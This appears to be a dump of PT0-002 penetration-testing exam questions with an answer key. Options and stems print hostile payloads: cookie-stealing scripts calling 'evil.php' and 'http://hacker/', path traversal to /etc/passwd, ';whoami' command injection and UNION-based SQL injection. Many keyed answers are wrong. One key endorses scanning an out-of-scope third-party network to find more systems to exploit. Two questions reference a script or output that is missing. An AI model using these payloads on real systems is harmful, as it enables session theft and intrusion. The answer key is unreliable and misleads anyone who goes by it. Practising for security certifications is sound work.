PT0-002 | All About Approved PT0-002 Preparation

NEW QUESTION 1
A penetration tester has identified several newly released CVEs on a VoIP call manager. The scanning tool the tester used determined the possible presence of the CVEs based off the version number of the service. Which of the following methods would BEST support validation of the possible findings?

• A. Manually check the version number of the VoIP service against the CVE release
• B. Test with proof-of-concept code from an exploit database
• C. Review SIP traffic from an on-path position to look for indicators of compromise
• D. Utilize an nmap –sV scan against the service

Answer: D

NEW QUESTION 2
A penetration tester has completed an analysis of the various software products produced by the company under assessment. The tester found that over the past several years the company has been including vulnerable third-party modules in multiple products, even though the quality of the organic code being developed is very good. Which of the following recommendations should the penetration tester include in the report?

• A. Add a dependency checker into the tool chain.
• B. Perform routine static and dynamic analysis of committed code.
• C. Validate API security settings before deployment.
• D. Perform fuzz testing of compiled binaries.

Answer: D

NEW QUESTION 3
A Chief Information Security Officer wants a penetration tester to evaluate the security awareness level of the company’s employees.
Which of the following tools can help the tester achieve this goal?

• A. Metasploit
• B. Hydra
• C. SET
• D. WPScan

Answer: A

NEW QUESTION 4
A penetration tester has established an on-path attack position and must now specially craft a DNS query response to be sent back to a target host. Which of the following utilities would BEST support this objective?

• A. Socat
• B. tcpdump
• C. Scapy
• D. dig

Answer: A

NEW QUESTION 5
A client wants a security assessment company to perform a penetration test against its hot site. The purpose of the test is to determine the effectiveness of the defenses that protect against disruptions to business continuity. Which of the following is the MOST important action to take before starting this type of assessment?

• A. Ensure the client has signed the SOW.
• B. Verify the client has granted network access to the hot site.
• C. Determine if the failover environment relies on resources not owned by the client.
• D. Establish communication and escalation procedures with the client.

Answer: A

NEW QUESTION 6
Which of the following tools would be MOST useful in collecting vendor and other security-relevant information for IoT devices to support passive reconnaissance?

• A. Shodan
• B. Nmap
• C. WebScarab-NG
• D. Nessus

Answer: B

NEW QUESTION 7
A penetration tester writes the following script:

Which of the following objectives is the tester attempting to achieve?

• A. Determine active hosts on the network.
• B. Set the TTL of ping packets for stealth.
• C. Fill the ARP table of the networked devices.
• D. Scan the system on the most used ports.

Answer: A

NEW QUESTION 8
A penetration tester would like to obtain FTP credentials by deploying a workstation as an on-path attack between the target and the server that has the FTP protocol. Which of the following methods would be the BEST to accomplish this objective?

• A. Wait for the next login and perform a downgrade attack on the server.
• B. Capture traffic using Wireshark.
• C. Perform a brute-force attack over the server.
• D. Use an FTP exploit against the server.

Answer: B

NEW QUESTION 9
Penetration-testing activities have concluded, and the initial findings have been reviewed with the client. Which of the following best describes the NEXT step in the engagement?

• A. Acceptance by the client and sign-off on the final report
• B. Scheduling of follow-up actions and retesting
• C. Attestation of findings and delivery of the report
• D. Review of the lessons learned during the engagement

Answer: A

NEW QUESTION 10
A penetration tester completed a vulnerability scan against a web server and identified a single but severe vulnerability.
Which of the following is the BEST way to ensure this is a true positive?

• A. Run another scanner to compare.
• B. Perform a manual test on the server.
• C. Check the results on the scanner.
• D. Look for the vulnerability online.

Answer: B

NEW QUESTION 11
A tester who is performing a penetration test on a website receives the following output:
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /var/www/search.php on line 62
Which of the following commands can be used to further attack the website?

• A. <script>var adr= ‘../evil.php?test=’ + escape(document.cookie);</script>
• B. ../../../../../../../../../../etc/passwd
• C. /var/www/html/index.php;whoami
• D. 1 UNION SELECT 1, DATABASE(),3-

Answer: C

NEW QUESTION 12
User credentials were captured from a database during an assessment and cracked using rainbow tables. Based on the ease of compromise, which of the following algorithms was MOST likely used to store the passwords in the database?

• A. MD5
• B. bcrypt
• C. SHA-1
• D. PBKDF2

Answer: A

NEW QUESTION 13
A penetration tester performs the following command: curl –I –http2 https://www.comptia.org
Which of the following snippets of output will the tester MOST likely receive?

• A. Option A
• B. Option B
• C. Option C
• D. Option D

Answer: A

NEW QUESTION 14
Given the following code:
<SCRIPT>var+img=new+Image();img.src=”http://hacker/%20+%20document.cookie;</SCRIPT>
Which of the following are the BEST methods to prevent against this type of attack? (Choose two.)

• A. Web-application firewall
• B. Parameterized queries
• C. Output encoding
• D. Session tokens
• E. Input validation
• F. Base64 encoding

Answer: BE

NEW QUESTION 15
A penetration tester has gained access to a network device that has a previously unknown IP range on an interface. Further research determines this is an always-on VPN tunnel to a third-party supplier.
Which of the following is the BEST action for the penetration tester to take?

• A. Utilize the tunnel as a means of pivoting to other internal devices.
• B. Disregard the IP range, as it is out of scope.
• C. Stop the assessment and inform the emergency contact.
• D. Scan the IP range for additional systems to exploit.

Answer: D

NEW QUESTION 16
A penetration tester is able to capture the NTLM challenge-response traffic between a client and a server. Which of the following can be done with the pcap to gain access to the server?

• A. Perform vertical privilege escalation.
• B. Replay the captured traffic to the server to recreate the session.
• C. Use John the Ripper to crack the password.
• D. Utilize a pass-the-hash attack.

Answer: D

NEW QUESTION 17
A penetration tester is working on a scoping document with a new client. The methodology the client uses includes the following:
Pre-engagement interaction (scoping and ROE)
Intelligence gathering (reconnaissance)
Threat modeling
Vulnerability analysis
Exploitation and post exploitation
Reporting
Which of the following methodologies does the client use?

• A. OWASP Web Security Testing Guide
• B. PTES technical guidelines
• C. NIST SP 800-115
• D. OSSTMM

Answer: B

NEW QUESTION 18
......